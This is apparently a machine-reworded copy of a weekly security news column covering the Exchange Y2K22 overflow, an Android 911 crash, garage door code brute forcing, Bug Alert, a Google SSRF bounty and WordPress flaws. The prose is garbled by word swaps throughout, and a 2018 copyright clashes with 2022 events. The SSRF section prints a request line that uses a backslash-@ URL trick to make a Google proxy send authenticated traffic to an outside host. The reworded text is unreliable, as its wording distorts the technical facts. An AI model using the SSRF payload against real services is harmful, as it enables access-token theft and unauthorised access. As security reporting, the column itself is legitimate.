THIS WEEK IN SECURITY: Y2K22, unintentionally BLOCKING 911, as well as BUG ALERT

Posted On
Posted By bqwwu

If you had the misfortune of running a Microsoft exchange server this past week, then you don’t requirement me to tell you about the Y2K22 problem. To catch rest of us up, when exchange tried to download the very first malware definitions update of 2022, the version number of the new definitions triggered a accident in the malware detection engine. The date is represented as the string 2201010001, where the very first two digits represent the year. This string gets converted to a signed long integer, which maxes out at 2,147,483,647. The integer overflows, as well as the result is undefined behavior, crashing the engine. The server stops working safe, not processing any type of messages without a working malware engine, which implies that no e-mail gets through. pleased new year!

Android 911 Denial of Service

Dialing 911 for emergency services is quite much the worst time for a software application bug to manifest itself. Google just fixed such a bug in the January Android update. It’s one of those strange unintentional app interactions — in this situation Microsoft teams triggering the Android bug. If the teams app is installed, however no account logged in, teams produces as well as registers a new PhoneAccount item on every launch. This seems like it ought to be rare, however teams on Android is likewise notorious for logging out the individual spontaneously. When you dial 911, Android runs a routine to identify which PhoneAccount ought to be utilized to path the call, as well as solves ties by comparing hashes. That comparison is just a naive subtraction, implying that there’s a 50% possibility in getting a unfavorable result. This was unanticipated, leading to the crash.

Garage Door reverse Engineering

Reverse engineering a 30-year-old wireless authorization plan may not be the most interest grabbing feat, however in some cases the journey is its own reward. [Maxwell Dulin] brings us the story, as well as this journey is definitely worth it. The basics of this hack are certainly still viable, starting with taking a look at the hardware. The garage door is synced to the garage door opener by holding a pushbutton on the receiver while sending a code. inside the opener, there are nine dip switches, each with three positions. What do they do? He pulled out his reliable SDR to get the web traffic as well as try to decode the signals. Inspectrum as well as GNU Radio were the heroes here, providing insight into this easy auth scheme. The final thought on this actual garage door? You can brute force an unknown code by sending every possible combo, as well as it only takes 104 minutes.

BugAlert

If you’re a sysadmin, you understand that some issues phone call for instant action. If you ran Java servers, the Log4J vulnerability was a terminate test of your reaction protocol. the time between public disclosure as well as whenever you heard about it, may have been sufficient to set off disaster. While there are several bug reporting services as well as frameworks, nothing rather fits this niche utilize case: notifying you as soon as possible that your hair may really be on fire. That unfilled niche bugged [Matthew Sullivan], who has revealed a new project, Bug Alert. It’s all open source, so you can hold your own instance if you truly want to. You can opt to get a tweet, text, or even phone call. This has the prospective to be a helpful tool, take a look!

I feel like I requirement to make Bug Alert set off a specific strange Al song…

The Zombie SSRF

[David Schütz] was searching for obscure Google APIs, as well as found jobs.googleapis.com, which you can demo yourself. That demo is interesting, since it’s not a completely fleshed-out service, however talks to the genuine back-end. The requests go with a proxy, cxl-services.appspot.com, which handles the authentication step for the demo page. If he might set off a Server-Side request Forgery (SSRF), he may be able to get at the authenticated requests, as well as perhaps technique the proxy into sending web traffic on his behalf. URL parsing is hard. The technique that worked? A backslash in the url. get /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ HTTP/1.1

With an gain access to token in hand, [David] started thoroughly checking out other Google APIs to see what this token provided him gain access to to. He provides the cautioning we’ve covered before, be cautious exactly how far you push. He might have reported the bug best away, however wished to verify that he really had a online gain access to token. After confirming the token helped checked out access, he turned in the finding, as well as netted a extremely good $3133.70, in addition to an additional $1000 for a great report as well as the cautious look at lateral movement. That’s all there is to it, right? Nope. just before the 90 day disclosure deadline passed, [David] found a repair bypass. adding any type of text between the backslash as well as @ was sufficient to break it. one more $3133.70. just for fun, he probed the old URLs, that shouldn’t be in service after the fix. Yep, he discovered yet one more safety and security token, as well as netted $3133.70. This Zombie SSRF still isn’t dead, as evidenced on Twitter:

WordPress Update

If you haven’t set your WordPress instance to update automatically, it’s time to go inspect for the most recent version. There are four potentially harmful problems here, though the details are scarce at this point. very first up is a Cross-Site Scripting vulnerability in publish slugs, the part of the URL that matches the publish name. The second problem discussed is item injection in some multisite configurations. The last two vulnerabilities are SQL injections, certainly deserving of the “What Year is It?” meme.

leave a Comment

Copyright 2018 All rights reserved.